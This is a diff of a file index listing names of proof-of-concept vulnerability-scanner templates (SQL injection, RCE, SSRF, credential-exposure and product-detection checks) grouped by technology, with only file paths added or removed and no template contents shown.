./poc/git/exposed-gitlab-ci-config.yaml @@ -46931,6 +46904,7 @@ ./poc/git/exposed-gitworkflows.yaml ./poc/git/git-config-7633.yaml ./poc/git/git-config-7634.yaml +./poc/git/git-config-7635.yaml ./poc/git/git-config-7636.yaml ./poc/git/git-config-7637.yaml ./poc/git/git-config-7638.yaml 
@@ -46943,9 +46917,10 @@ ./poc/git/git-config-nginxoffbyslash-5.yaml ./poc/git/git-config-nginxoffbyslash-6.yaml ./poc/git/git-config-nginxoffbyslash-7.yaml +./poc/git/git-config-nginxoffbyslash-7628.yaml ./poc/git/git-config-nginxoffbyslash-7629.yaml +./poc/git/git-config-nginxoffbyslash-7630.yaml ./poc/git/git-config-nginxoffbyslash-7631.yaml -./poc/git/git-config-nginxoffbyslash-7632.yaml ./poc/git/git-config-nginxoffbyslash-8.yaml ./poc/git/git-config-nginxoffbyslash-9.yaml ./poc/git/git-config-nginxoffbyslash.yaml @@ -46953,8 +46928,9 @@ ./poc/git/git-credentials-7643.yaml ./poc/git/git-credentials-7644.yaml ./poc/git/git-credentials-disclosure-7639.yaml -./poc/git/git-credentials-disclosure-7640.yaml +./poc/git/git-credentials-disclosure-7641.yaml ./poc/git/git-credentials-disclosure-7642.yaml +./poc/git/git-credentials-disclosure.yaml ./poc/git/git-credentials.yaml ./poc/git/git-exposure.yaml ./poc/git/git-folder.yaml @@ -46975,6 +46951,7 @@ ./poc/git/gitbook-detect-7624.yaml ./poc/git/gitbook-detect-7625.yaml ./poc/git/gitbook-takeover-7626.yaml +./poc/git/gitbook-takeover-7627.yaml ./poc/git/gitbook-takeover.yaml ./poc/git/gitbook.yaml ./poc/git/gitbucket.yaml @@ -46990,15 +46967,18 @@ ./poc/git/github-app-token.yaml ./poc/git/github-enterprise-detect-7647.yaml ./poc/git/github-enterprise-detect-7648.yaml +./poc/git/github-enterprise-detect-7649.yaml ./poc/git/github-enterprise-detect-7650.yaml ./poc/git/github-enterprise-detect-7651.yaml ./poc/git/github-enterprise-detect.yaml ./poc/git/github-gemfile-files-1.yaml ./poc/git/github-gemfile-files-2.yaml ./poc/git/github-gemfile-files-7652.yaml +./poc/git/github-gemfile-files-7653.yaml ./poc/git/github-login-check.yaml ./poc/git/github-oauth-token.yaml ./poc/git/github-outdated-key.yaml +./poc/git/github-page-config-7654.yaml ./poc/git/github-page-config-7655.yaml ./poc/git/github-page-config-7656.yaml ./poc/git/github-personal-token.yaml 
@@ -47031,8 +47011,8 @@ ./poc/git/github-workflows-disclosure-5.yaml ./poc/git/github-workflows-disclosure-6.yaml ./poc/git/github-workflows-disclosure-7.yaml +./poc/git/github-workflows-disclosure-7664.yaml ./poc/git/github-workflows-disclosure-7665.yaml -./poc/git/github-workflows-disclosure-7666.yaml ./poc/git/github-workflows-disclosure-8.yaml ./poc/git/github-workflows-disclosure-9.yaml ./poc/git/github-workflows-disclosure.yaml @@ -47061,10 +47041,8 @@ ./poc/git/gitlab-public-repos-7678.yaml ./poc/git/gitlab-public-repos-7679.yaml ./poc/git/gitlab-public-repos-7680.yaml -./poc/git/gitlab-public-repos.yaml ./poc/git/gitlab-public-signup-7681.yaml ./poc/git/gitlab-public-signup-7682.yaml -./poc/git/gitlab-public-signup-7683.yaml ./poc/git/gitlab-public-signup-7684.yaml ./poc/git/gitlab-public-signup.yaml ./poc/git/gitlab-public-snippets-1.yaml @@ -47102,7 +47080,6 @@ ./poc/git/gitlab-weak-login-7705.yaml ./poc/git/gitlab-weak-login-7706.yaml ./poc/git/gitlab-weak-login-7707.yaml -./poc/git/gitlab-weak-login.yaml ./poc/git/gitlab-workflow-7708.yaml ./poc/git/gitleak.yaml ./poc/git/gitlist-disclosure.yaml @@ -47129,7 +47106,6 @@ ./poc/git/woo-checkout-for-digital-goods-c4950da5cbd10141c56c420499671594.yaml ./poc/git/woo-checkout-for-digital-goods.yaml ./poc/git/wordpress-git-config-1.yaml -./poc/git/wordpress-git-config-11278.yaml ./poc/git/wordpress-git-config-11279.yaml ./poc/git/wordpress-git-config-2.yaml ./poc/git/wp-githuber-md-3d4ca604f74dfc99007278807d75f075.yaml @@ -47154,7 +47130,7 @@ ./poc/google/address-autocomplete-using-google-place-api-plugin.yaml ./poc/google/address-autocomplete-using-google-place-api.yaml ./poc/google/ads-malware-google.yaml -./poc/google/api-google-drive.yaml +./poc/google/api-google-drive-432.yaml ./poc/google/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/google/api-key-for-google-maps.yaml ./poc/google/bwp-google-xml-sitemaps-b789bd36fd13df2696b89e73e738641b.yaml 
@@ -47330,6 +47306,7 @@ ./poc/google/google-earth-dlogin-7778.yaml ./poc/google/google-earth-dlogin-7779.yaml ./poc/google/google-earth-dlogin-7780.yaml +./poc/google/google-earth-dlogin-7781.yaml ./poc/google/google-earth-dlogin-7782.yaml ./poc/google/google-earth-dlogin.yaml ./poc/google/google-earthenterprise-weak-password.yaml @@ -47438,6 +47415,7 @@ ./poc/google/google-places-reviews-a9b6955a2812b2fe0a13ae0f0752d58f.yaml ./poc/google/google-places-reviews.yaml ./poc/google/google-safebrowsing.yaml +./poc/google/google-secrets.yaml ./poc/google/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/google/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/google/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47469,6 +47447,7 @@ ./poc/google/google-sitemap-plugin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/google/google-sitemap-plugin-plugin.yaml ./poc/google/google-sitemap-plugin.yaml +./poc/google/google-storage-7788.yaml ./poc/google/google-storage-7789.yaml ./poc/google/google-storage-7790.yaml ./poc/google/google-storage-7791.yaml @@ -47828,15 +47807,15 @@ ./poc/graphql/graphql-8.yaml ./poc/graphql/graphql-9.yaml ./poc/graphql/graphql-alias-batching-7826.yaml -./poc/graphql/graphql-alias-batching.yaml ./poc/graphql/graphql-apiforwp-detect.yaml ./poc/graphql/graphql-apollo-detect.yaml ./poc/graphql/graphql-ariadne-detect.yaml ./poc/graphql/graphql-array-batching-7827.yaml ./poc/graphql/graphql-array-batching-7828.yaml +./poc/graphql/graphql-array-batching.yaml ./poc/graphql/graphql-depth-limit.yaml ./poc/graphql/graphql-detect-7829.yaml -./poc/graphql/graphql-detect-7831.yaml +./poc/graphql/graphql-detect-7830.yaml ./poc/graphql/graphql-detect-7832.yaml ./poc/graphql/graphql-detect.yaml ./poc/graphql/graphql-dianajl-detect.yaml 
@@ -47845,7 +47824,6 @@ ./poc/graphql/graphql-flutter-detect.yaml ./poc/graphql/graphql-get-method-7835.yaml ./poc/graphql/graphql-get-method-7836.yaml -./poc/graphql/graphql-get-method.yaml ./poc/graphql/graphql-go-detect.yaml ./poc/graphql/graphql-gqlgen-detect.yaml ./poc/graphql/graphql-graphene-detect.yaml @@ -47869,6 +47847,7 @@ ./poc/graphql/hasura-graphql-psql-exec-7902.yaml ./poc/graphql/hasura-graphql-ssrf-7903.yaml ./poc/graphql/hasura-graphql-ssrf-7904.yaml +./poc/graphql/hasura-graphql-ssrf-7905.yaml ./poc/graphql/hasura-graphql-ssrf-7906.yaml ./poc/graphql/hasura-graphql-ssrf.yaml ./poc/graphql/hidden-graphql-endpoint-discovery.yaml @@ -47940,6 +47919,7 @@ ./poc/header/header-blind-time-sql-injection.yaml ./poc/header/header-command-injection-7917.yaml ./poc/header/header-command-injection-7918.yaml +./poc/header/header-command-injection-7919.yaml ./poc/header/header-command-injection-7920.yaml ./poc/header/header-command-injection.yaml ./poc/header/header-enhancement-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml @@ -47974,10 +47954,8 @@ ./poc/header/hidden-data-in-headers.yaml ./poc/header/hidden-http-header-injection.yaml ./poc/header/host-header-auth-bypass.yaml -./poc/header/host-header-injection-8000.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml -./poc/header/host-header-poisoning.yaml ./poc/header/hostheaderpoisoning.yaml ./poc/header/http-cache-header.yaml ./poc/header/http-cors-header.yaml @@ -47988,7 +47966,6 @@ ./poc/header/http-headers-a66a555d9e5fa4a2bb41c853ef9462e9.yaml ./poc/header/http-headers.yaml ./poc/header/http-missing-security-headers-8058.yaml -./poc/header/http-missing-security-headers.yaml ./poc/header/http-xframe-header.yaml ./poc/header/insert-headers-and-footers-07e3cd9581f59ebebf0ea2afde0b3b69.yaml ./poc/header/insert-headers-and-footers-7d5f28d00d66d203ff5a11666d3be6e5.yaml 
@@ -47996,11 +47973,14 @@ ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml +./poc/header/log4j-header.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml ./poc/header/null-auth-header-auth-bypass.yaml ./poc/header/oob-header-based-interaction-9248.yaml ./poc/header/oob-header-based-interaction-9249.yaml +./poc/header/oob-header-based-interaction-9250.yaml +./poc/header/oob-header-based-interaction.yaml ./poc/header/pearl-header-builder-2ad1e0994a7bb85ac431ac6afa84db60.yaml ./poc/header/pearl-header-builder-a51f1388039630606710e61f15390639.yaml ./poc/header/pearl-header-builder.yaml @@ -48009,7 +47989,6 @@ ./poc/header/responsive-header-image-slider.yaml ./poc/header/splash-header-ae1af7b8de10cb8ae21a4838e673d47b.yaml ./poc/header/splash-header.yaml -./poc/header/sqli_header-10504.yaml ./poc/header/sqli_header.yaml ./poc/header/sqliheader.yaml ./poc/header/sticky-header-effects-for-elementor.yaml @@ -48043,7 +48022,6 @@ ./poc/http/apache-httpd-cve-2021-40438-ssrf.yml ./poc/http/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/http/apache-httpd-cve-2021-41773-rce.yml -./poc/http/apache-httpd-rce-362.yaml ./poc/http/apache-httpd-rce-363.yaml ./poc/http/apache-httpd-rce.yaml ./poc/http/axtls-embad-httpd.yaml @@ -48051,11 +48029,9 @@ ./poc/http/basic_http.yaml ./poc/http/cl-http.yaml ./poc/http/cl-te-http-request-smuggling.yaml -./poc/http/cl-te-http-smuggling.yaml ./poc/http/crystal-live-http-server-lfi.yaml ./poc/http/default-ibm-http-server-6856.yaml ./poc/http/default-ibm-http-server.yaml -./poc/http/default-lighttpd-page-6866.yaml ./poc/http/default-lighttpd-page-6867.yaml ./poc/http/detect-dns-over-https-6969.yaml ./poc/http/detect-dns-over-https.yaml 
@@ -48083,7 +48059,6 @@ ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml ./poc/http/http-https-remover.yaml ./poc/http/http-missing-security-headers-8058.yaml -./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml @@ -48091,22 +48066,21 @@ ./poc/http/http-trace.yaml ./poc/http/http-username-password.yaml ./poc/http/http-value-share-template-1.yaml +./poc/http/http-value-share-template-2.yaml ./poc/http/http-verb-tampering.yaml ./poc/http/http-xframe-header.yaml ./poc/http/httpbin-detection.yaml ./poc/http/httpbin-detection.yml ./poc/http/httpbin-open-redirect-8048.yaml ./poc/http/httpbin-open-redirect-8049.yaml -./poc/http/httpbin-open-redirect.yaml ./poc/http/httpbin-open-redirect.yml ./poc/http/httpbin-panel-8050.yaml -./poc/http/httpbin-panel-8051.yaml ./poc/http/httpbin-panel.yaml ./poc/http/httpbin-xss-8052.yaml ./poc/http/httpbin-xss-8053.yaml ./poc/http/httpbin-xss.yml ./poc/http/httpd-config-8054.yaml -./poc/http/httpd-config.yaml +./poc/http/httpd-config-8055.yaml ./poc/http/httpfs.yaml ./poc/http/httponly-cookie-detect.yaml ./poc/http/https-to-http-redirect.yaml @@ -48116,7 +48090,6 @@ ./poc/http/ibm-http-server-8095.yaml ./poc/http/ibm-http-server-8096.yaml ./poc/http/ibm-http-server-8097.yaml -./poc/http/ibm-http-server.yaml ./poc/http/iis-enum-httpapi.yaml ./poc/http/knopflerfish-http-server.yaml ./poc/http/lighttpd-default-8627.yaml @@ -48135,6 +48108,7 @@ ./poc/http/oracle-http-server-12c-9381.yaml ./poc/http/oracle-http-server-12c-9382.yaml ./poc/http/oracle-http-server-12c-9383.yaml +./poc/http/oracle-http-server-12c-9384.yaml ./poc/http/oracle-http-server-12c.yaml ./poc/http/oracle-httpserver12c.yaml ./poc/http/rmihttpserver.yaml 
@@ -48161,8 +48135,8 @@ ./poc/ibm/IBM-Signup-Exposure.yaml ./poc/ibm/default-ibm-http-server-6856.yaml ./poc/ibm/default-ibm-http-server.yaml +./poc/ibm/ibm-advanced-system-management-8088.yaml ./poc/ibm/ibm-advanced-system-management-8089.yaml -./poc/ibm/ibm-advanced-system-management-8090.yaml ./poc/ibm/ibm-advanced-system-management-8091.yaml ./poc/ibm/ibm-advanced-system-management.yaml ./poc/ibm/ibm-app-connect-login.yaml @@ -48193,7 +48167,6 @@ ./poc/ibm/ibm-http-server-8095.yaml ./poc/ibm/ibm-http-server-8096.yaml ./poc/ibm/ibm-http-server-8097.yaml -./poc/ibm/ibm-http-server.yaml ./poc/ibm/ibm-imm.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8098.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8099.yaml @@ -48219,8 +48192,8 @@ ./poc/ibm/ibm-mqseries.yaml ./poc/ibm/ibm-note-login-1.yaml ./poc/ibm/ibm-note-login-2.yaml -./poc/ibm/ibm-note-login-8110.yaml ./poc/ibm/ibm-note-login-8111.yaml +./poc/ibm/ibm-note-login-8112.yaml ./poc/ibm/ibm-note-login.yaml ./poc/ibm/ibm-odm-detect.yaml ./poc/ibm/ibm-odm-panel.yaml @@ -48230,7 +48203,6 @@ ./poc/ibm/ibm-security-access-manager.yaml ./poc/ibm/ibm-service-assistant-8116.yaml ./poc/ibm/ibm-service-assistant-8117.yaml -./poc/ibm/ibm-service-assistant-8118.yaml ./poc/ibm/ibm-service-assistant.yaml ./poc/ibm/ibm-signup-exposure-8119.yaml ./poc/ibm/ibm-signup-exposure-8120.yaml @@ -48276,8 +48248,9 @@ ./poc/injection/beescms_v3-login-sql-injection.yaml ./poc/injection/biometric-data-injection-registration.yaml ./poc/injection/biometric-data-injection.yaml -./poc/injection/buffalo-config-injection-798.yaml ./poc/injection/buffalo-config-injection-799.yaml +./poc/injection/buffalo-config-injection-800.yaml +./poc/injection/buffalo-config-injection-801.yaml ./poc/injection/buffalo-config-injection.yaml ./poc/injection/chanjet-crm-get-usedspace-sql-injection.yaml ./poc/injection/cmseasy-crossall-act-php-sql-injection.yaml 
@@ -48290,6 +48263,7 @@ ./poc/injection/crlf-injection-1.yaml ./poc/injection/crlf-injection-1260.yaml ./poc/injection/crlf-injection-1261.yaml +./poc/injection/crlf-injection-1262.yaml ./poc/injection/crlf-injection-1263.yaml ./poc/injection/crlf-injection-1264.yaml ./poc/injection/crlf-injection-1265.yaml @@ -48316,7 +48290,9 @@ ./poc/injection/drupal_module-social-sql-injection.yaml ./poc/injection/duomicms-sql-injection-7122.yaml ./poc/injection/duomicms-sql-injection-7123.yaml +./poc/injection/duomicms-sql-injection-7124.yaml ./poc/injection/duomicms-sql-injection-7125.yaml +./poc/injection/duomicms-sql-injection.yaml ./poc/injection/error-based-get-sql-injection.yaml ./poc/injection/error-based-post-sql-injection.yaml ./poc/injection/error-based-sql-injection-7249.yaml @@ -48328,17 +48304,18 @@ ./poc/injection/fuzzing-xss-get-params-html-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml +./poc/injection/glpi-9.3.3-sql-injection.yaml ./poc/injection/header-blind-sql-injection.yaml ./poc/injection/header-blind-time-sql-injection.yaml ./poc/injection/header-command-injection-7917.yaml ./poc/injection/header-command-injection-7918.yaml +./poc/injection/header-command-injection-7919.yaml ./poc/injection/header-command-injection-7920.yaml ./poc/injection/header-command-injection.yaml ./poc/injection/header-injection.yaml ./poc/injection/hidden-command-injection.yaml ./poc/injection/hidden-http-header-injection.yaml ./poc/injection/hidden-ldap-injection.yaml -./poc/injection/host-header-injection-8000.yaml ./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml 
@@ -48480,6 +48457,7 @@ ./poc/java/default-glassfish-server-page-6854.yaml ./poc/java/default-glassfish-server-page-6855.yaml ./poc/java/default-glassfish-server-page.yaml +./poc/java/default-jetty-page-6862.yaml ./poc/java/default-jetty-page-6863.yaml ./poc/java/default-jetty-page-6864.yaml ./poc/java/default-jetty-page-6865.yaml @@ -48489,12 +48467,13 @@ ./poc/java/e-cology-springframework-directory-traversal.yaml ./poc/java/ecology-javabeanshell-rce.yaml ./poc/java/ecology-springframework-directory-traversal-7174.yaml -./poc/java/ecology-springframework-directory-traversal-7175.yaml +./poc/java/ecology-springframework-directory-traversal.yaml ./poc/java/ecology-springframework-directory-traversal.yml ./poc/java/ecology-springframework-directoryTraversal.yaml ./poc/java/exposed-alps-spring-1.yaml ./poc/java/exposed-alps-spring-2.yaml ./poc/java/exposed-alps-spring-3.yaml +./poc/java/exposed-alps-spring-7283.yaml ./poc/java/exposed-alps-spring-7284.yaml ./poc/java/exposed-alps-spring-7285.yaml ./poc/java/exposed-alps-spring.yaml @@ -48521,6 +48500,7 @@ ./poc/java/java-melody-xss-8225.yaml ./poc/java/java-melody-xss-8226.yaml ./poc/java/java-melody-xss.yaml +./poc/java/java-rmi-detect-8227.yaml ./poc/java/java-rmi-detect-8228.yaml ./poc/java/java-rmi-detect.yaml ./poc/java/javamelody-detect.yaml @@ -48537,7 +48517,7 @@ ./poc/java/jboss-as.yaml ./poc/java/jboss-cve-2010-1871.yml ./poc/java/jboss-default-password.yaml -./poc/java/jboss-detect.yaml +./poc/java/jboss-detect-8237.yaml ./poc/java/jboss-eap.yaml ./poc/java/jboss-jbpm-admin.yaml ./poc/java/jboss-juddi.yaml 
@@ -48556,17 +48536,16 @@ ./poc/java/jetty-information-disclosure.yaml ./poc/java/jetty-showcontexts-enable-8295.yaml ./poc/java/jetty-showcontexts-enable-8296.yaml -./poc/java/jetty-showcontexts-enable-8297.yaml ./poc/java/jetty-showcontexts-enable.yaml ./poc/java/jetty-workflow.yaml ./poc/java/jetty.yaml -./poc/java/jinfornet-jreport-lfi-8308.yaml +./poc/java/jinfornet-jreport-lfi-8307.yaml ./poc/java/jinfornet-jreport-lfi-8309.yaml ./poc/java/jinfornet-jreport-lfi-8310.yaml ./poc/java/jinfornet-jreport-lfi.yaml ./poc/java/jolokia-tomcat-creds-leak.yaml ./poc/java/jsf-detection-8396.yaml -./poc/java/jsf-detection-8397.yaml +./poc/java/jsf-detection-8398.yaml ./poc/java/jsf-detection.yaml ./poc/java/jsf.yaml ./poc/java/jsp-source-code-vulnerabilities.yaml @@ -48592,7 +48571,6 @@ ./poc/java/public-tomcat-instance.yaml ./poc/java/public-tomcat-manager-1.yaml ./poc/java/public-tomcat-manager-2.yaml -./poc/java/public-tomcat-manager-9708.yaml ./poc/java/public-tomcat-manager-9709.yaml ./poc/java/public-tomcat-manager-9710.yaml ./poc/java/public-tomcat-manager-9711.yaml @@ -48603,7 +48581,6 @@ ./poc/java/shiro-124-rememberme.yaml ./poc/java/shiro-deserialization-detection.yaml ./poc/java/shiro-detect-10195.yaml -./poc/java/shiro-detect-10196.yaml ./poc/java/shiro-detect-10197.yaml ./poc/java/spring-boot-admin.yaml ./poc/java/spring-cloud-cve-2020-5405.yml @@ -48613,8 +48590,9 @@ ./poc/java/spring-cve-2016-4977.yaml ./poc/java/spring-cve-2016-4977.yml ./poc/java/spring-eureka.yaml -./poc/java/spring-framework-exceptions-10493.yaml +./poc/java/spring-framework-exceptions.yaml ./poc/java/spring-framework.yaml +./poc/java/springForShell-CVE-2022-22963.yaml ./poc/java/springForShell-CVE-2022-22965.yaml ./poc/java/spring_cloud_gateway_CVE_2022_22947.yaml ./poc/java/spring_cloud_gateway_cve_2022_22947.yaml 
@@ -48622,20 +48600,18 @@ ./poc/java/springboot-actuator-1.yaml ./poc/java/springboot-actuator-10433.yaml ./poc/java/springboot-actuator-10434.yaml -./poc/java/springboot-actuator-10435.yaml ./poc/java/springboot-actuator-2.yaml ./poc/java/springboot-actuator-unauth.yaml ./poc/java/springboot-actuators-jolokia-xxe-1.yaml ./poc/java/springboot-actuators-jolokia-xxe-10428.yaml ./poc/java/springboot-actuators-jolokia-xxe-10429.yaml -./poc/java/springboot-actuators-jolokia-xxe-10431.yaml +./poc/java/springboot-actuators-jolokia-xxe-10430.yaml ./poc/java/springboot-actuators-jolokia-xxe-10432.yaml ./poc/java/springboot-actuators-jolokia-xxe-2.yaml ./poc/java/springboot-actuators-jolokia-xxe.yaml ./poc/java/springboot-autoconfig-1.yaml ./poc/java/springboot-autoconfig-10437.yaml ./poc/java/springboot-autoconfig-2.yaml -./poc/java/springboot-autoconfig.yaml ./poc/java/springboot-beans-1.yaml ./poc/java/springboot-beans-10439.yaml ./poc/java/springboot-beans-10440.yaml @@ -48643,6 +48619,7 @@ ./poc/java/springboot-beans-2.yaml ./poc/java/springboot-conditions.yaml ./poc/java/springboot-configprops-1.yaml +./poc/java/springboot-configprops-10442.yaml ./poc/java/springboot-configprops-10443.yaml ./poc/java/springboot-configprops-10444.yaml ./poc/java/springboot-configprops-10445.yaml @@ -48655,6 +48632,7 @@ ./poc/java/springboot-env-1.yaml ./poc/java/springboot-env-10448.yaml ./poc/java/springboot-env-10449.yaml +./poc/java/springboot-env-10450.yaml ./poc/java/springboot-env-10451.yaml ./poc/java/springboot-env-2.yaml ./poc/java/springboot-env-unauth.yaml 
@@ -48666,16 +48644,15 @@ ./poc/java/springboot-h2-db-rce-10454.yaml ./poc/java/springboot-h2-db-rce-10455.yaml ./poc/java/springboot-h2-db-rce-10456.yaml -./poc/java/springboot-h2-db-rce-10457.yaml ./poc/java/springboot-h2-db-rce-10458.yaml +./poc/java/springboot-h2-db-rce.yaml ./poc/java/springboot-health-1.yaml +./poc/java/springboot-health-10459.yaml ./poc/java/springboot-health-10460.yaml ./poc/java/springboot-health-2.yaml -./poc/java/springboot-health.yaml ./poc/java/springboot-heapdump-1.yaml ./poc/java/springboot-heapdump-10461.yaml ./poc/java/springboot-heapdump-10462.yaml -./poc/java/springboot-heapdump-10463.yaml ./poc/java/springboot-heapdump-10464.yaml ./poc/java/springboot-heapdump-10465.yaml ./poc/java/springboot-heapdump-2.yaml @@ -48687,6 +48664,7 @@ ./poc/java/springboot-httptrace-10469.yaml ./poc/java/springboot-httptrace-2.yaml ./poc/java/springboot-info-10470.yaml +./poc/java/springboot-info.yaml ./poc/java/springboot-jolokia.yaml ./poc/java/springboot-log4j-rce-10472.yaml ./poc/java/springboot-log4j-rce-10473.yaml @@ -48694,13 +48672,13 @@ ./poc/java/springboot-logfile.yaml ./poc/java/springboot-loggers-1.yaml ./poc/java/springboot-loggers-10475.yaml -./poc/java/springboot-loggers-10476.yaml +./poc/java/springboot-loggers-10477.yaml ./poc/java/springboot-loggers-2.yaml ./poc/java/springboot-loggers.yaml ./poc/java/springboot-mappings-1.yaml +./poc/java/springboot-mappings-10478.yaml ./poc/java/springboot-mappings-10479.yaml ./poc/java/springboot-mappings-10480.yaml -./poc/java/springboot-mappings-10481.yaml ./poc/java/springboot-mappings-2.yaml ./poc/java/springboot-mappings.yaml ./poc/java/springboot-metrics-1.yaml 
@@ -48711,14 +48689,12 @@ ./poc/java/springboot-threaddump-1.yaml ./poc/java/springboot-threaddump-10484.yaml ./poc/java/springboot-threaddump-10485.yaml -./poc/java/springboot-threaddump-10486.yaml ./poc/java/springboot-threaddump-10487.yaml ./poc/java/springboot-threaddump-2.yaml ./poc/java/springboot-trace-10488.yaml ./poc/java/springboot-trace-10489.yaml ./poc/java/springboot-trace-10491.yaml ./poc/java/springboot-trace-10492.yaml -./poc/java/springboot-trace.yaml ./poc/java/springboot-whitelabel.yaml ./poc/java/springboot-workflow.yaml ./poc/java/springboot2.x_eureka_rce.yaml @@ -48733,7 +48709,7 @@ ./poc/java/struts-debug-mode-10560.yaml ./poc/java/struts-debug-mode.yaml ./poc/java/struts-problem-report-10562.yaml -./poc/java/struts-problem-report-10563.yaml +./poc/java/struts-problem-report-10564.yaml ./poc/java/struts-problem-report.yaml ./poc/java/struts2_001.yaml ./poc/java/sun-glassfish.yaml @@ -48748,6 +48724,7 @@ ./poc/java/tomcat-default-login-10789.yaml ./poc/java/tomcat-default-login-10790.yaml ./poc/java/tomcat-default-login-10791.yaml +./poc/java/tomcat-default-login.yaml ./poc/java/tomcat-default-manager.yaml ./poc/java/tomcat-detect-10792.yaml ./poc/java/tomcat-detect-10793.yaml @@ -48785,7 +48762,6 @@ ./poc/java/tomcat-pathnormalization-10799.yaml ./poc/java/tomcat-pathnormalization-10800.yaml ./poc/java/tomcat-pathnormalization-2.yaml -./poc/java/tomcat-pathnormalization.yaml ./poc/java/tomcat-scripts-1.yaml ./poc/java/tomcat-scripts-10801.yaml ./poc/java/tomcat-scripts-10802.yaml 
@@ -48832,11 +48808,10 @@ ./poc/java/weblogic-ssrf.yaml ./poc/java/weblogic-ssrf.yml ./poc/java/weblogic-t3-detect-11151.yaml -./poc/java/weblogic-t3-detect-11152.yaml +./poc/java/weblogic-t3-detect-11153.yaml ./poc/java/weblogic-t3-detect.yaml ./poc/java/weblogic-t3-search.yaml ./poc/java/weblogic-uddiexplorer.yaml -./poc/java/weblogic-weak-login-11154.yaml ./poc/java/weblogic-weak-login-11155.yaml ./poc/java/weblogic-weak-login-11156.yaml ./poc/java/weblogic-workflow-11157.yaml @@ -48844,12 +48819,12 @@ ./poc/java/websphere-portal-preauth-ssrf.yaml ./poc/java/websphere-version-detect.yaml ./poc/java/webview-addjavascript-interface-11175.yaml -./poc/java/webview-addjavascript-interface-11177.yaml +./poc/java/webview-addjavascript-interface-11176.yaml ./poc/java/webview-addjavascript-interface.yaml ./poc/java/webview-javascript-11178.yaml ./poc/java/webview-javascript.yaml +./poc/java/wildfly-panel-11209.yaml ./poc/java/wildfly-panel-11210.yaml -./poc/java/wildfly-panel-11211.yaml ./poc/java/wildfly-panel.yaml ./poc/java/wildfly-server.yaml ./poc/java/wpdbspringclean-ec00604b0e8ff72061ba569674a03777.yaml @@ -48903,8 +48878,8 @@ ./poc/javascript/auth-json.yaml ./poc/javascript/azuredeploy-json.yaml ./poc/javascript/bower-json-768.yaml -./poc/javascript/bower-json-769.yaml ./poc/javascript/bower-json-770.yaml +./poc/javascript/bower-json.yaml ./poc/javascript/composer-auth-json.yaml ./poc/javascript/config-js.yaml ./poc/javascript/credentials-json.yaml 
@@ -48951,19 +48926,21 @@ ./poc/javascript/fastjson-1-2-24-rce-1.yaml ./poc/javascript/fastjson-1-2-24-rce-2.yaml ./poc/javascript/fastjson-1-2-24-rce-7400.yaml -./poc/javascript/fastjson-1-2-24-rce.yaml ./poc/javascript/fastjson-1-2-41-rce-7401.yaml ./poc/javascript/fastjson-1-2-41-rce-7403.yaml ./poc/javascript/fastjson-1-2-41-rce-7404.yaml +./poc/javascript/fastjson-1-2-41-rce.yaml ./poc/javascript/fastjson-1-2-42-rce-7405.yaml ./poc/javascript/fastjson-1-2-42-rce-7407.yaml -./poc/javascript/fastjson-1-2-42-rce.yaml +./poc/javascript/fastjson-1-2-42-rce-7408.yaml ./poc/javascript/fastjson-1-2-43-rce-7409.yaml ./poc/javascript/fastjson-1-2-43-rce-7411.yaml +./poc/javascript/fastjson-1-2-43-rce-7412.yaml ./poc/javascript/fastjson-1-2-47-rce-7413.yaml ./poc/javascript/fastjson-1-2-47-rce-7415.yaml ./poc/javascript/fastjson-1-2-47-rce-7416.yaml ./poc/javascript/fastjson-1-2-62-rce-7417.yaml +./poc/javascript/fastjson-1-2-62-rce-7419.yaml ./poc/javascript/fastjson-1-2-62-rce-7420.yaml ./poc/javascript/fastjson-1-2-67-rce-7421.yaml ./poc/javascript/fastjson-1-2-67-rce-7423.yaml @@ -49093,10 +49070,9 @@ ./poc/javascript/jsbe.yaml ./poc/javascript/jsconfig-json.yaml ./poc/javascript/jsf-detection-8396.yaml -./poc/javascript/jsf-detection-8397.yaml +./poc/javascript/jsf-detection-8398.yaml ./poc/javascript/jsf-detection.yaml ./poc/javascript/jsf.yaml -./poc/javascript/jsherp-boot-panel.yaml ./poc/javascript/jsmol2wp-6fc39d92daef6aed5760a4b5f8458d00.yaml ./poc/javascript/jsmol2wp-d5be42322ff31dc7bf613195f697a548.yaml ./poc/javascript/jsmol2wp.yaml @@ -49124,7 +49100,7 @@ ./poc/javascript/jsyhit-system.yaml ./poc/javascript/jwks-json.yaml ./poc/javascript/keycloak-json-8471.yaml -./poc/javascript/keycloak-json-8472.yaml +./poc/javascript/keycloak-json-8473.yaml ./poc/javascript/keycloak-json-8474.yaml ./poc/javascript/keys-js.yaml ./poc/javascript/knight-lab-timelinejs-0f42e86470e92d725c0f62d2c358c29e.yaml 
